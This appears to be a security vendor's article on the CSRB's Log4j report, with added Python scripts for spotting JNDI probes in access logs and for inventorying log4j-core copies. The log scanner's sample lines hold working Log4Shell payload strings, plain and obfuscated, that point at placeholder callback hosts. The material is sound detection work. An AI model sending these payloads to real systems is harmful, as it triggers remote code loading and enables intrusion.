Considered an ‘Endemic Vulnerability’, DHS Reports
The Cyber Safety Review Board (CSRB), a panel established by the Department of Homeland Security (DHS) in February, released a warning that the Apache Log4j flaw has evolved into an “endemic vulnerability” and will continue to plague organizations for years to come. The panel is composed of private and public sector industry leaders tasked by the DHS to identify key lessons and non-binding recommendations from significant cybersecurity events.
The CSRB engaged with almost 80 organizations to understand how the vulnerability has been, or is still being, mitigated. The board is also tasked with developing actionable recommendations for preventing, and effectively responding to, future incidents of this kind. The announcement comes with a 52-page report, the first of its kind by the CSRB, detailing the exploitation, the mitigation efforts and the systemic security challenges to the ecosystem surrounding the December 2021 Log4j event.
Broken down into three sections, the report provides factual information on the vulnerability and what happened, the findings and conclusions based on an analysis of those facts, and a list of recommendations. The 19 actionable recommendations are subdivided into four categories: (1) Address the continued risks from the Log4j vulnerabilities; (2) Drive existing best practices for security hygiene; (3) Build a better software ecosystem; and (4) Identify worthwhile future investments.
Here are the key takeaways from the newly released report to help public and private sector organizations mitigate severe vulnerabilities.
Proactive and Consistent Monitoring
Exploitation of the Log4j flaw will persist and evolve long after the dust has settled. The board recommends that organizations proactively monitor for, and update, systems vulnerable to the Log4j flaw. Likewise, federal agencies should report any observed instances of Log4j exploitation to CISA, the CSRB said.
“The Board predicts that, given the ubiquity of Log4j, vulnerable versions will remain in systems for the next decade, and we will see exploitation evolve to effectively take advantage of the weaknesses.”
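The "monitor for exploitation" recommendation is harder than it sounds, because the probes that hit web servers rarely contain the literal string that a first-pass detection rule looks for. The script below is an added example, not code from the CSRB report or from this page's authors: it scans combined-format web access logs for JNDI lookup strings after first collapsing the nested Log4j lookups (`${lower:}`, `${upper:}` and the `:-` default-value syntax) that attackers use to hide the keyword, and URL-decodes request fields first. The log lines are constructed for the example and use RFC 5737 documentation addresses.

```python
"""Spot Log4Shell-style JNDI lookup probes in web access logs.

Added example, not code from the CSRB report or this page's authors. A naive
substring match on "${jndi:" misses most real probes, which hide the keyword
behind nested Log4j lookups; this normalises those lookups first. The access
log lines below are constructed for the example.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after de-obfuscation: ${jndi:<scheme>://<callback host>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}:]+)", re.IGNORECASE)
# Apache/nginx combined log format.
_CLF = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')


def _reduce(m):
    """Collapse one innermost lookup to the literal text Log4j would produce."""
    body = m.group(1)
    name, sep, value = body.partition(":")
    if name.lower() == "jndi":
        return m.group(0)                # never rewrite the lookup we are hunting for
    if ":-" in body:                     # default-value syntax: ${x:-j}, ${::-j}, ${env:NOPE:-j}
        return body.rsplit(":-", 1)[1]
    if sep and name.lower() == "lower":
        return value.lower()
    if sep and name.lower() == "upper":
        return value.upper()
    return m.group(0)                    # unknown lookup types are left intact


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, _INNER.sub(_reduce, text)
    return text


def scan_line(line: str):
    """Return a finding for a probe in the request line, Referer or User-Agent, else None."""
    m = _CLF.match(line)
    if not m:
        return None
    for field in ("request", "referer", "agent"):
        normalized = normalize_lookups(unquote(m.group(field)))
        hit = _JNDI.search(normalized)
        if hit:
            return {"src": m.group("ip"), "field": field,
                    "scheme": hit.group(1).lower(), "callback": hit.group(2),
                    "normalized": normalized}
    return None


def scan(lines):
    return [f for f in map(scan_line, lines) if f]


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:15 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain probe in User-Agent
    '198.51.100.23 - - [10/Dec/2021:03:15:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    # URL-encoded and wrapped in ${lower:} lookups, in the query string
    '198.51.100.24 - - [10/Dec/2021:03:15:09 +0000] "GET /?x=%24%7B%24%7Blower:j%7Dndi:'
    '%24%7Blower:l%7Ddap://198.51.100.24/x%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    # spelled out with default-value lookups, in Referer
    '198.51.100.25 - - [10/Dec/2021:03:15:17 +0000] "GET / HTTP/1.1" 200 512 '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.25:1099/o}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src"], finding["field"], finding["scheme"], finding["callback"])
```

Two caveats a practitioner should keep in mind. A hit in an access log is evidence of an attempt, not of compromise: the string only does damage if it reaches a vulnerable Log4j instance that logs it, so confirm by looking for outbound LDAP, RMI or DNS connections from the Java process to the callback host, and by checking the application's own logs. And the normaliser above covers the common obfuscations, not every lookup type Log4j supports; treat it as a triage filter in front of a fuller rule set, not as the rule set.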
Patching Exploited Vulnerabilities
Organizations impacted by the Log4j flaw have faced a rocky mitigation and patching process. The time, money and resources needed for responding to the flaw have often had a financial impact on companies and delayed other mission-critical security tasks, including responding to other flaws. One federal cabinet department spent over 33,000 hours responding to the Log4j flaw, the CSRB found.
“The impact to organizations over the long term will be difficult to assess without better tools for discerning real exploitation and centralized reporting of successful compromises,” according to the report.
Long-tail Log4j Scenario
“The ‘long-tail’ scenario outlined in the report is one we’ve seen with countless past vulnerabilities, and one that favors attackers since their success is based on having at least one victim who hasn’t patched their systems,” said Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center.
“Given management of open source software is different than commercial software, and open source powers commercial software, reliance on a commercial vendor to alert consumers of a problem presumes that the vendor is properly managing their usage of open source and that they are able to identify and alert all users of their impacted software – even if support for that software has ended.”
Accurate Asset Inventory
One of the most important recommendations is to create and maintain an accurate IT asset inventory: a vulnerability cannot be addressed if nobody knows where it exists. That requires a complete software bill of materials (SBOM) covering every third-party component and dependency used in a software product, including the transitive dependencies that other libraries pull in, which is how log4j-core reached many of the systems that turned out to be affected.
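Where no SBOM exists, the inventory has to be reconstructed from what is actually deployed, and a file-name search is not enough: log4j-core is routinely bundled inside WAR and EAR files, and "patched" copies that merely had the JndiLookup class deleted still report their old version. The script below is an added example, not code from the CSRB report or from this page's authors. It walks a directory tree, opens every archive (recursing into archives nested inside archives), identifies log4j-core by its Maven pom.properties, records whether the JndiLookup class is still present, and flags versions below the fixed releases. The fixed-version table is the one for the December 2021 CVE series (through CVE-2021-44832) and is stated as an assumption to be checked against your own vulnerability feed; the sample archives written by make_fixture() are constructed stand-ins containing placeholder bytes, not real Log4j builds.

```python
"""Inventory log4j-core copies on a host, including JARs nested in WAR/EAR files.

Added example, not code from the CSRB report or this page's authors. It finds
log4j-core by its Maven pom.properties inside each archive, records whether the
JndiLookup class is still present, and flags versions below the fixed releases.
The archives built by make_fixture() are constructed stand-ins, not real builds.
"""
import io
import os
import re
import zipfile
from dataclasses import dataclass

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear", ".zip")
# First release per Log4j 2 branch that closed the December 2021 CVE series
# (through CVE-2021-44832). Assumption: verify against your own vulnerability feed.
FIXED = {(2, 17): (2, 17, 1), (2, 12): (2, 12, 4), (2, 3): (2, 3, 2)}


def parse_version(v: str) -> tuple:
    nums = tuple(int(x) for x in re.findall(r"\d+", v)[:3])
    return nums + (0,) * (3 - len(nums))


def is_vulnerable(version: str) -> bool:
    ver = parse_version(version)
    if ver[0] != 2:                      # only the 2.x line is assessed here
        return False
    return ver < FIXED.get(ver[:2], (2, 17, 1))


@dataclass
class Finding:
    path: str          # outer file, with "!" separating nested archives
    version: str
    jndi_present: bool
    vulnerable: bool


def scan_archive(zf: zipfile.ZipFile, path: str, out: list) -> None:
    names = set(zf.namelist())
    if POM in names:
        m = re.search(r"^version=(.+)$", zf.read(POM).decode("utf-8", "replace"), re.M)
        version = m.group(1).strip() if m else "unknown"
        out.append(Finding(path, version, JNDI_CLASS in names,
                           is_vulnerable(version) if m else True))
    elif JNDI_CLASS in names:            # shaded/fat JAR with Maven metadata stripped
        out.append(Finding(path, "unknown (shaded)", True, True))
    for name in names:                   # recurse: WEB-INF/lib/*.jar inside a WAR, etc.
        if name.lower().endswith(ARCHIVES):
            try:
                scan_archive(zipfile.ZipFile(io.BytesIO(zf.read(name))), f"{path}!{name}", out)
            except zipfile.BadZipFile:
                pass


def scan_tree(root: str) -> list:
    out = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVES):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        scan_archive(zf, full, out)
                except zipfile.BadZipFile:
                    pass
    return sorted(out, key=lambda f: f.path)


def make_fixture(root: str) -> None:
    """Write constructed sample archives under root (placeholder bytes, not real classes)."""
    def jar(path, version=None, jndi=False, extra=None):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            if version:
                zf.writestr(POM, f"version={version}\nartifactId=log4j-core\n")
            if jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
            for name, data in (extra or {}).items():
                zf.writestr(name, data)
    jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "2.14.1", jndi=True)
    jar(os.path.join(root, "lib", "log4j-core-2.17.1.jar"), "2.17.1", jndi=True)
    jar(os.path.join(root, "lib", "commons-io-2.11.0.jar"), extra={"org/x/IOUtils.class": b""})
    # "mitigated" by deleting JndiLookup.class but never upgraded
    jar(os.path.join(root, "legacy", "log4j-core-2.10.0.jar"), "2.10.0", jndi=False)
    # WAR bundling its own vulnerable copy, invisible to a plain file-name search
    nested = io.BytesIO()
    with zipfile.ZipFile(nested, "w") as zf:
        zf.writestr(POM, "version=2.12.2\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    jar(os.path.join(root, "webapps", "app.war"),
        extra={"WEB-INF/lib/log4j-core-2.12.2.jar": nested.getvalue()})


def demo() -> list:
    """Build the fixture in a temporary directory and scan it."""
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        make_fixture(d)
        return scan_tree(d)


if __name__ == "__main__":
    for f in demo():
        print(f"{'VULNERABLE' if f.vulnerable else 'ok'}  {f.version:<16} jndi={f.jndi_present}  {f.path}")
```

Read the two flags together: a copy with jndi_present false and vulnerable true is one where someone removed the JndiLookup class as an emergency mitigation and never followed up with the upgrade, which is exactly the long-tail population the report warns about. The scan only covers the Log4j 2 line; end-of-life Log4j 1.x ships under a different package path and needs its own check.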
Enhanced Security Risk Assessment
One of the biggest problems in addressing the Log4j vulnerabilities is understanding the actual security risk they pose to a given organization, rather than the theoretical one. The report also recommends that enterprises develop a vulnerability response program and a vulnerability disclosure and handling process, and it suggests the U.S. government investigate whether a Software Security Risk Assessment Center of Excellence is viable.
Managed Detection and Response (MDR)
Organizations are encouraged to fine-tune their security operations with Cybersecurity Incident Response Service (CIRS) providers offering ongoing training and Managed Detection and Response (MDR) services, so that an attacker who has been evicted does not regain entry.
MDR services cover vulnerability management: investing in vulnerability scanning technologies to identify vulnerable systems, maintaining asset and application inventories, and creating a vulnerability response program and vulnerability disclosure and handling processes. A capable CIRS provider goes beyond technical fixes, supporting reputational recovery and closing security gaps over the long term.
Get Ahead of Risks the Right Way
“Log4j remains deeply embedded in systems, and even within the short period available for our review, community stakeholders have identified new compromises, new threat actors, and new learnings,” CSRB warns. “We must remain vigilant against the risks associated with this vulnerability, and apply the best practices described in this review.”
Monitoring and managing security to respond to evolving threats like the Log4j bug is a continuous battle and should be part of your ongoing operational strategy. Reach out to our cybersecurity team today to perform a complete risk assessment of your digital infrastructure and build a resilient security posture against various threats.